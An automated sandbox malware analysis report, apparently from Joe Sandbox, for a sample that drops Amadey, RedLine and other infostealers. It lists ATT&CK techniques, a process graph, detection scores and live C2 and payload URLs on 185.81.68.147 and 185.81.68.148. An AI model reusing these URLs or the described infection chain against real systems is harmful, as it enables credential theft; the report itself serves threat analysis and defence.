                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          Abuse Elevation Control Mechanism
                          11
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          1
                          Remote Desktop Protocol
                          1
                          Archive Collected Data
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts13
                          Native API
                          1
                          Scheduled Task/Job
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          1
                          Credential API Hooking
                          1
                          Account Discovery
                          Remote Desktop Protocol3
                          Data from Local System
                          1
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Shared Modules
                          1
                          Registry Run Keys / Startup Folder
                          1
                          Access Token Manipulation
                          1
                          Abuse Elevation Control Mechanism
                          1
                          Credentials in Registry
                          3
                          File and Directory Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Exploitation for Client Execution
                          Login Hook1012
                          Process Injection
                          2
                          Obfuscated Files or Information
                          1
                          Credentials In Files
                          138
                          System Information Discovery
                          Distributed Component Object Model1
                          Credential API Hooking
                          2
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts2
                          Command and Scripting Interpreter
                          Network Logon Script1
                          Scheduled Task/Job
                          1
                          Timestomp
                          LSA Secrets681
                          Security Software Discovery
                          SSH3
                          Clipboard Data
                          122
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable Media1
                          Scheduled Task/Job
                          RC Scripts1
                          Registry Run Keys / Startup Folder
                          1
                          DLL Side-Loading
                          Cached Domain Credentials351
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Rootkit
                          DCSync3
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                          Masquerading
                          Proc Filesystem1
                          Application Window Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt351
                          Virtualization/Sandbox Evasion
                          /etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                          Access Token Manipulation
                          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1012
                          Process Injection
                          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                          Hidden Files and Directories
                          KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                          Rundll32
                          GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574303 Sample: mggoBrtk9t.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 115 Suricata IDS alerts for network traffic 2->115 117 Found malware configuration 2->117 119 Malicious sample detected (through community Yara rule) 2->119 121 15 other signatures 2->121 9 mggoBrtk9t.exe 1 3 2->9         started        13 Gxtuum.exe 2->13         started        16 Gxtuum.exe 2->16         started        process3 dnsIp4 87 C:\Users\user\...\A629855EB2A22925382193.exe, PE32+ 9->87 dropped 89 A629855EB2A2292538...exe:Zone.Identifier, ASCII 9->89 dropped 153 Found evasive API chain (may stop execution after checking mutex) 9->153 155 Found API chain indicative of debugger detection 9->155 157 Contains functionality to inject threads in other processes 9->157 161 8 other signatures 9->161 18 svchost.exe 1 9->18         started        21 audiodg.exe 1 9->21         started        23 msiexec.exe 1 9->23         started        113 185.81.68.148, 49937, 49946, 49959 KLNOPT-ASFI Finland 13->113 91 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 13->91 dropped 93 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 13->93 dropped 95 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 13->95 dropped 97 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 13->97 dropped 159 Contains functionality to start a terminal service 13->159 25 rundll32.exe 13->25         started        27 rundll32.exe 13->27         started        29 rundll32.exe 13->29         started        31 rundll32.exe 13->31         started        file5 signatures6 process7 signatures8 123 Found evasive API chain (may stop execution after checking mutex) 18->123 125 Found API chain indicative of debugger detection 18->125 127 Contains functionality to inject threads in other processes 18->127 133 4 other signatures 18->133 33 explorer.exe 92 19 18->33 injected 129 Changes the view of files in windows explorer (hidden files and folders) 21->129 38 rundll32.exe 25->38         started        40 rundll32.exe 27->40         started        131 System process connects to network (likely due to code injection or exploit) 29->131 process9 dnsIp10 111 185.81.68.147, 1912, 49713, 49714 KLNOPT-ASFI Finland 33->111 79 C:\Users\user\AppData\...\759D.tmp.gfx.exe, PE32 33->79 dropped 81 C:\Users\user\AppData\...\6B1D.tmp.update.exe, PE32+ 33->81 dropped 83 C:\Users\user\AppData\...\6148.tmp.ssg.exe, PE32 33->83 dropped 85 C:\Users\user\AppData\...\56C7.tmp.ctx.exe, PE32+ 33->85 dropped 135 Benign windows process drops PE files 33->135 137 Found evasive API chain (may stop execution after checking mutex) 33->137 139 Contains functionality to start a terminal service 33->139 141 Contains functionality to inject threads in other processes 33->141 42 56C7.tmp.ctx.exe 52 33->42         started        46 A629855EB2A22925382193.exe 3 33->46         started        48 A629855EB2A22925382193.exe 3 33->48         started        58 2 other processes 33->58 143 Tries to steal Instant Messenger accounts or passwords 38->143 145 Tries to harvest and steal ftp login credentials 38->145 147 Tries to harvest and steal browser information (history, passwords, etc) 38->147 50 powershell.exe 38->50         started        52 netsh.exe 38->52         started        149 Uses netsh to modify the Windows network and firewall settings 40->149 151 Tries to harvest and steal WLAN passwords 40->151 54 powershell.exe 40->54         started        56 netsh.exe 40->56         started        file11 signatures12 process13 file14 99 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 42->99 dropped 101 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 42->101 dropped 103 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 42->103 dropped 109 47 other files (7 malicious) 42->109 dropped 163 Multi AV Scanner detection for dropped file 42->163 165 Machine Learning detection for dropped file 42->165 60 56C7.tmp.ctx.exe 42->60         started        167 Found evasive API chain (may stop execution after checking mutex) 46->167 169 Found API chain indicative of debugger detection 46->169 171 Contains functionality to inject threads in other processes 46->171 183 3 other signatures 46->183 75 3 other processes 46->75 173 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 48->173 185 3 other signatures 48->185 62 msiexec.exe 48->62         started        77 2 other processes 48->77 65 conhost.exe 50->65         started        67 conhost.exe 52->67         started        105 C:\Users\user\...\246122658369_Desktop.zip, Zip 54->105 dropped 175 Loading BitLocker PowerShell Module 54->175 69 conhost.exe 54->69         started        71 conhost.exe 56->71         started        107 C:\Users\user\AppData\Local\...behaviorgraphxtuum.exe, PE32 58->107 dropped 177 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 58->177 179 Contains functionality to start a terminal service 58->179 181 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 58->181 187 2 other signatures 58->187 73 Gxtuum.exe 58->73         started        signatures15 process16 signatures17 189 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 62->189 191 Multi AV Scanner detection for dropped file 73->191 193 Contains functionality to start a terminal service 73->193

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          mggoBrtk9t.exe55%ReversingLabsWin64.Trojan.Leonem
                          mggoBrtk9t.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\6B1D.tmp.update.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\clip64[1].dll47%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\cred64[1].dll34%ReversingLabsWin64.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe29%ReversingLabsWin64.Infostealer.ClipBanker
                          C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe68%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                          C:\Users\user\AppData\Local\Temp\6B1D.tmp.update.exe55%ReversingLabsWin64.Trojan.Leonem
                          C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe66%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\_MEI15962\VCRUNTIME140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\_bz2.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\_ctypes.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\_hashlib.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\_lzma.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\_socket.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\libcrypto-1_1.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\libffi-7.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\python38.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\select.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\ucrtbase.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI15962\unicodedata.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe66%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll47%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll34%ReversingLabsWin64.Infostealer.Tinba
                          C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe55%ReversingLabsWin64.Trojan.Leonem
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://185.81.68.147/46122658-3693405117-2476756634-1003100%Avira URL Cloudphishing
                          http://185.81.68.147/7vhfjke3/index.phpb8b100%Avira URL Cloudphishing
                          http://185.81.68.148/8Fvu5jh100%Avira URL Cloudphishing
                          http://185.81.68.147/7vhfjke3/index.php#100%Avira URL Cloudphishing
                          http://185.81.68.148/8Fvu5jh4DbS/index.phpsK1bRhSyTkkD9QYQDw4TYWGHLCsdncEYUAc100%Avira URL Cloudphishing
                          http://185.81.68.148/8Fvu5jh4DbS/index.phps100%Avira URL Cloudphishing
                          http://185.81.68.147/wsys100%Avira URL Cloudphishing
                          http://185.81.68.147/7vhfjke3/Plugins/cred64.dll100%Avira URL Cloudphishing
                          http://185.81.68.148/8Fvu5jh4DbS/index.phpJU:100%Avira URL Cloudphishing
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%Avira URL Cloudsafe
                          http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$100%Avira URL Cloudphishing
                          http://185.81.68.147/7vhfjke3/index.phpHo5100%Avira URL Cloudphishing
                          http://185.81.68.148/Fvu5jh4DbS/index.php100%Avira URL Cloudphishing
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%Avira URL Cloudsafe
                          http://185.81.68.147/7vhfjke3/Plugins/clip64.dll100%Avira URL Cloudphishing
                          http://185.81.68.148/8Fvu5jh4DbS/index.phpndows100%Avira URL Cloudphishing
                          http://185.81.68.147/gfx.exe100%Avira URL Cloudmalware
                          http://185.81.68.148/J100%Avira URL Cloudphishing
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
                          http://185.81.68.148/8Fvu5jh4DbS/index.php(100%Avira URL Cloudphishing
                          http://185.81.68.148/8Fvu5jh4DbS/index.php100%Avira URL Cloudmalware
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          http://185.81.68.147/gfx.exetrue
                          • Avira URL Cloud: malware
                          unknown
                          http://185.81.68.148/8Fvu5jh4DbS/index.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/02/sc/sct6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://185.81.68.147/46122658-3693405117-2476756634-1003Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://185.81.68.147/7vhfjke3/index.php#Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://tempuri.org/Entity/Id23ResponseD6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002D4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Entity/Id12Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1331938648.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id2Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha16148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id21Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#56C7.tmp.ctx.exe, 00000010.00000003.1541380109.0000026ABBDA6000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1550156579.0000026ABBDA7000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD8B000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1541214933.0000026ABBD70000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD75000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1540992398.0000026ABBD4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://185.81.68.148/8Fvu5jhrundll32.exe, 00000022.00000002.3798980117.0000000003211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://tempuri.org/Entity/Id6ResponseD6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://185.81.68.148/8Fvu5jh4DbS/index.phpsK1bRhSyTkkD9QYQDw4TYWGHLCsdncEYUAcrundll32.exe, 00000021.00000002.3797376340.0000000002E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://185.81.68.147/7vhfjke3/Plugins/cred64.dllGxtuum.exe, 00000017.00000002.3805886910.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&ocexplorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id13ResponseD6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexeexplorer.exe, 00000005.00000002.3822099222.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1331938648.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3082261334.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2193186163.00000000089B8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/fault6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://185.81.68.148/8Fvu5jh4DbS/index.phpsGxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: phishing
                                                                        unknown
                                                                        http://185.81.68.148/8Fvu5jh4DbS/index.phpJU:rundll32.exe, 0000001A.00000002.3469272832.00000222064D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: phishing
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id15Response6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.rd.com/list/best-cities-by-generation/explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://185.81.68.147/wsysGxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: phishing
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002C09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.ip.sb/ip6148.tmp.ssg.exe, 00000011.00000000.1536966434.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id1ResponseD6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://185.81.68.147/7vhfjke3/index.phpb8bGxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: phishing
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
